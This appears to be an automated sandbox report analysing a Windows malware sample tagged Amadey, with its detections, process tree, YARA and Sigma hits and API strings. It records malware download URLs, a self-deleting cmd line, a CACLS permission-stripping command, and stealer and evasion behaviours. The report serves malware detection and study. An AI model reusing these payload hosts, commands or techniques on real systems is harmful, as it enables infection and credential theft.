Play interactive tour

Edit tour

Windows Analysis Report v72n86vFFq.exe

Overview

General Information

Sample Name:	v72n86vFFq.exe
Analysis ID:	531707
MD5:	1a430b2cbf785427c87c48d29a1a8c0f
SHA1:	e9b392c34c1bf0e42599bb561f111e3bcea7b3d9
SHA256:	1d1fc9d23aa14b4f484fb86c173c94084bc14a9f551747b6e06366649a229af5
Tags:	Amadeyexe
Infos:
Most interesting Screenshot:

Detection

Amadey Cryptbot RedLine SmokeLoader Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Cryptbot

Detected unpacking (overwrites its own PE header)

Yara detected SmokeLoader

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Yara detected Vidar stealer

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to evade analysis by execution special instruction which cause usermode exception

Query firmware table information (likely to detect VMs)

Connects to many ports of the same IP (likely port scanning)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Contains functionality to inject code into remote processes

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Hides threads from debuggers

Tries to steal Crypto Currency Wallets

.NET source code references suspicious native API functions

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

.NET source code contains method to dynamically call methods (often used by packers)

PE file has nameless sections

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Del in CommandLine

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Checks for debuggers (devices)

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality for execution timing, often used to detect debuggers

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Contains capabilities to detect virtual machines

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

v72n86vFFq.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\v72n86vFFq.exe" MD5: 1A430B2CBF785427C87C48D29A1A8C0F)

v72n86vFFq.exe (PID: 1440 cmdline: "C:\Users\user\Desktop\v72n86vFFq.exe" MD5: 1A430B2CBF785427C87C48D29A1A8C0F)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

12F1.exe (PID: 6580 cmdline: C:\Users\user\AppData\Local\Temp\12F1.exe MD5: 31F17AD58D02772DF14EFAC37D416CD7)

1EAA.exe (PID: 5572 cmdline: C:\Users\user\AppData\Local\Temp\1EAA.exe MD5: 5115E5DAB211559A85CD0154E8100F53)

conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

1EAA.exe (PID: 6700 cmdline: C:\Users\user\AppData\Local\Temp\1EAA.exe MD5: 5115E5DAB211559A85CD0154E8100F53)

1EAA.exe (PID: 2740 cmdline: C:\Users\user\AppData\Local\Temp\1EAA.exe MD5: 5115E5DAB211559A85CD0154E8100F53)

361B.exe (PID: 6612 cmdline: C:\Users\user\AppData\Local\Temp\361B.exe MD5: DF13FAC0D8B182E4D8B9A02BA87A9571)

WerFault.exe (PID: 7140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

44A2.exe (PID: 6852 cmdline: C:\Users\user\AppData\Local\Temp\44A2.exe MD5: 45D0A6BB2CA00643FB04BF15D4AAA2C9)

cmd.exe (PID: 2892 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\44A2.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 5588 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

51B3.exe (PID: 1368 cmdline: C:\Users\user\AppData\Local\Temp\51B3.exe MD5: D2331EDF10B3C0E6A5C8FEC0A1A6392E)

51B3.exe (PID: 5820 cmdline: C:\Users\user\AppData\Local\Temp\51B3.exe MD5: D2331EDF10B3C0E6A5C8FEC0A1A6392E)

305.exe (PID: 1380 cmdline: C:\Users\user\AppData\Local\Temp\305.exe MD5: CA16CA4AA9CF9777274447C9F4BA222E)

2340.exe (PID: 6508 cmdline: C:\Users\user\AppData\Local\Temp\2340.exe MD5: 97617914D6E8A6E3CBEE8A5E5FF39AA5)

2340.exe (PID: 2812 cmdline: C:\Users\user\AppData\Local\Temp\2340.exe MD5: 97617914D6E8A6E3CBEE8A5E5FF39AA5)

cmd.exe (PID: 4432 cmdline: C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\user\AppData\Local\Temp\6829558ede\tkools.exe" /P "user:N MD5: F3BDBE3BB6F734E357235F4D5898582D)

hiftsuu (PID: 796 cmdline: C:\Users\user\AppData\Roaming\hiftsuu MD5: 1A430B2CBF785427C87C48D29A1A8C0F)

hiftsuu (PID: 6896 cmdline: C:\Users\user\AppData\Roaming\hiftsuu MD5: 1A430B2CBF785427C87C48D29A1A8C0F)

cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.814172336.0000000000580000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.948865342.0000000000CE2000.00000040.00020000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.736880382.0000000000540000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.737014881.0000000001F51000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000017.00000002.854879480.0000000002051000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000014.00000000.830171711.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000014.00000000.820409193.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.845557160.000000000434F000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x2fe30:$: VFZxUUFBT 0x8c890:$: VFZxUUFBT
0000000A.00000002.845557160.000000000434F000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000017.00000002.853177748.0000000000540000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000002.815844712.0000000002091000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000016.00000002.947756314.00000000012C5000.00000002.00020000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.947756314.00000000012C5000.00000002.00020000.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
00000006.00000000.724058055.0000000004F41000.00000020.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000A.00000002.847931111.0000000004503000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0xf68:$: VFZxUUFBT 0xba448:$: VFZxUUFBT
0000000A.00000002.847931111.0000000004503000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000016.00000003.835817824.00000000009D0000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.835817824.00000000009D0000.00000004.00000001.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
00000011.00000002.854851899.0000000000555000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.854851899.0000000000555000.00000004.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000014.00000000.829040256.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000014.00000002.938711812.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000014.00000000.832066411.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 12F1.exe PID: 6580	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 12F1.exe PID: 6580	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 1EAA.exe PID: 5572	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x9d800:$: VFZxUUFBT 0xcbd24:$: VFZxUUFBT 0x1907a0:$: VFZxUUFBT 0x1fc127:$: VFZxUUFBT
Process Memory Space: 1EAA.exe PID: 5572	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 1EAA.exe PID: 2740	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 305.exe PID: 1380	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 305.exe PID: 1380	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.0.1EAA.exe.400000.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
20.0.1EAA.exe.400000.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
20.0.1EAA.exe.400000.10.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
20.0.1EAA.exe.400000.6.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
20.2.1EAA.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
20.0.1EAA.exe.400000.12.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.1EAA.exe.45835c0.2.raw.unpack	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x39e88:$: VFZxUUFBT
10.2.1EAA.exe.45835c0.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.12F1.exe.ce0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.1EAA.exe.44e5e88.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.1EAA.exe.45835c0.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.1EAA.exe.44e5e88.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
20.2.1EAA.exe.2c0bae6.2.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x155f6:$x1: https://cdn.discordapp.com/attachments/
Click to see the 8 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Del in CommandLine

Show sources

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\44A2.exe" & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\44A2.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\44A2.exe, ParentImage: C:\Users\user\AppData\Local\Temp\44A2.exe, ParentProcessId: 6852, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\44A2.exe" & exit, ProcessId: 2892

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://host-file-host-3.com/files/8723_1638191106_2017.exe	Avira URL Cloud: Label: malware
Source: http://host-file-host-3.com/files/5311_1638303032_7343.exe	Avira URL Cloud: Label: malware
Source: http://host-file-host-3.com/files/6096_1638289274_6885.exe	Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-7000.com/downloads/toolspab3.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\305.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Avira: detection malicious, Label: HEUR/AGEN.1144480

Multi AV Scanner detection for submitted file

Show sources

Source: v72n86vFFq.exe

Virustotal: Detection: 32%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Metadefender: Detection: 25%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Metadefender: Detection: 37%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\2340.exe	ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\305.exe	Metadefender: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\305.exe	ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\361B.exe	Metadefender: Detection: 28%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\361B.exe	ReversingLabs: Detection: 51%

Machine Learning detection for sample

Show sources

Source: v72n86vFFq.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\305.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\361B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\hiftsuu	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Joe Sandbox ML: detected

Source: 17.2.44A2.exe.4e0e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.3.12F1.exe.2910000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 22.0.305.exe.1290000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 22.0.305.exe.1290000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 22.2.305.exe.1290000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 22.0.305.exe.1290000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 22.0.305.exe.1290000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\44A2.exe

Unpacked PE file: 17.2.44A2.exe.400000.0.unpack

Source: v72n86vFFq.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\AppData\Local\Temp\361B.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49832 version: TLS 1.2

Source:	Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 2340.exe, 00000019.00000002.937037876.0000000003851000.00000004.00000001.sdmp, 2340.exe, 0000001F.00000000.915270893.0000000000400000.00000040.00000001.sdmp, 2340.exe, 0000001F.00000002.938653145.0000000000400000.00000040.00000001.sdmp, 2340.exe, 0000001F.00000000.899393554.0000000000400000.00000040.00000001.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.812857479.0000000002EF5000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.812716030.0000000002EF5000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.812563577.0000000004EFC000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb{1d source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.815694930.0000000002EEF000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.812703884.0000000002EEF000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: QC:\honohuredaseso\ditajexibu\45\rasuwolo-gelif.pdb source: 51B3.exe, 00000015.00000000.808085529.0000000000401000.00000020.00020000.sdmp, 51B3.exe, 00000015.00000002.840399491.0000000000401000.00000020.00020000.sdmp, 51B3.exe, 00000017.00000000.831520191.0000000000401000.00000020.00020000.sdmp, 51B3.exe.6.dr
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: C:\yacopicugux28_yero\lub.pdb source: 361B.exe, 0000000D.00000002.895424066.0000000000416000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.792550514.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 00000013.00000002.892891509.0000000005110000.00000002.00020000.sdmp, 361B.exe.6.dr
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: C:\yacopicugux28_yero\lub.pdb02`e@ source: 361B.exe, 0000000D.00000002.895424066.0000000000416000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.792550514.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 00000013.00000002.892891509.0000000005110000.00000002.00020000.sdmp, 361B.exe.6.dr
Source:	Binary string: r_C:\hacih_76\dozuzoso.pdb source: 44A2.exe, 00000011.00000000.800373192.0000000000401000.00000020.00020000.sdmp, 44A2.exe.6.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.832216101.000000000515C000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: C:\hacih_76\dozuzoso.pdb source: 44A2.exe, 00000011.00000000.800373192.0000000000401000.00000020.00020000.sdmp, 44A2.exe.6.dr
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: C:\honohuredaseso\ditajexibu\45\rasuwolo-gelif.pdb source: 51B3.exe, 00000015.00000000.808085529.0000000000401000.00000020.00020000.sdmp, 51B3.exe, 00000015.00000002.840399491.0000000000401000.00000020.00020000.sdmp, 51B3.exe, 00000017.00000000.831520191.0000000000401000.00000020.00020000.sdmp, 51B3.exe.6.dr
Source:	Binary string: C:\repifuj_guwonip22\xenocuzoyipe\zijafohefejave.pdb source: v72n86vFFq.exe, hiftsuu.6.dr
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb}1b source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000013.00000003.812857479.0000000002EF5000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.812716030.0000000002EF5000.00000004.00000001.sdmp
Source:	Binary string: msimg32.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000013.00000003.815694930.0000000002EEF000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.812703884.0000000002EEF000.00000004.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Code function: 0_2_004342F0 lstrlenW,BackupWrite,_wscanf,__wremove,_puts,__putw,__wrename,_atexit,GetBinaryTypeW,SetCurrentDirectoryW,QueueUserWorkItem,GetBinaryTypeW,SetCurrentDirectoryW,LeaveCriticalSection,QueryDosDeviceA,TerminateJobObject,EnumDateFormatsExA,GlobalAddAtomW,CreateJobSet,WriteProfileStringW,GetFullPathNameA,VirtualAlloc,GetCompressedFileSizeW,WriteConsoleOutputAttribute,SetNamedPipeHandleState,lstrcpynW,GetFileAttributesA,FatalAppExitW,GetCurrentProcess,IsBadWritePtr,SetUnhandledExceptionFilter,QueueUserWorkItem,GetProcessHandleCount,QueueUserWorkItem,EnumResourceNamesW,DeleteTimerQueueTimer,SetFileApisToANSI,FindResourceA,AllocateUserPhysicalPages,GetBinaryTypeA,OpenMutexA,GetModuleFileNameW,CommConfigDialogA,HeapSize,_memset,CommConfigDialogA,HeapSize,GetComputerNameA,OpenMutexW,GetConsoleCursorInfo,OpenSemaphoreA,ResetWriteWatch,CreateActCtxA,LoadLibraryW,WriteProfileStringA,GetConsoleCursorInfo,OpenSemaphoreA,SetUnhandledExceptionFilter,ResetWriteWatch,ChangeTimerQueueTimer,SetFilePointer,SetCommState,EnumSystemLocalesA,_lclose,SetSystemTimeAdjustment,_memset,GetCommConfig,EnumDateFormatsW,LocalUnlock,WriteConsoleInputW,GetConsoleAliasExesLengthW,GetAtomNameA,IsBadStringPtrA,CreateIoCompletionPort,SearchPathA,SetConsoleCursorPosition,GetVolumePathNamesForVolumeNameW,SetConsoleCP,MoveFileExW,EnumDateFormatsExW,UnregisterWaitEx,SetSystemTime,SetThreadExecutionState,CreateHardLinkW,HeapWalk,lstrcpyA,SetFileValidData,OutputDebugStringA,FreeEnvironmentStringsW,FindNextFileA,FreeEnvironmentStringsW,FindFirstFileW,FindNextFileA,InterlockedDecrement,InterlockedDecrement,WaitNamedPipeW,WritePrivateProfileStringA,LoadLibraryW,DefineDosDeviceA,SetConsoleTitleW,GetPrivateProfileIntA,OutputDebugStringA,InterlockedPushEntrySList,CreateActCtxA,VirtualLock,lstrcatW,WriteProfileStringA,TerminateProcess,WritePrivateProfileSectionA,GlobalMemoryStatus,UnmapViewOfFile,_memset,GetDefaultCommConfigA,GetTempPathW,WriteFileGather,FindFirstFileW,ContinueDebugEvent,GetThreadSelectorEntry,FatalAppExitA,DeleteVolumeMountPointA,GetStringTypeA,CreateSemaphoreW,CreateSemaphoreW,SetLocalTime,EnumTimeFormatsA,FindResourceExA,GetPrivateProfileSectionNamesA,SetStdHandle,CloseHandle,CloseHandle,DeleteFileW,EnumDateFormatsA,CreateSemaphoreW,GetNumberFormatA,ReadConsoleOutputW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetVolumePathNamesForVolumeNameW,GetProcAddress,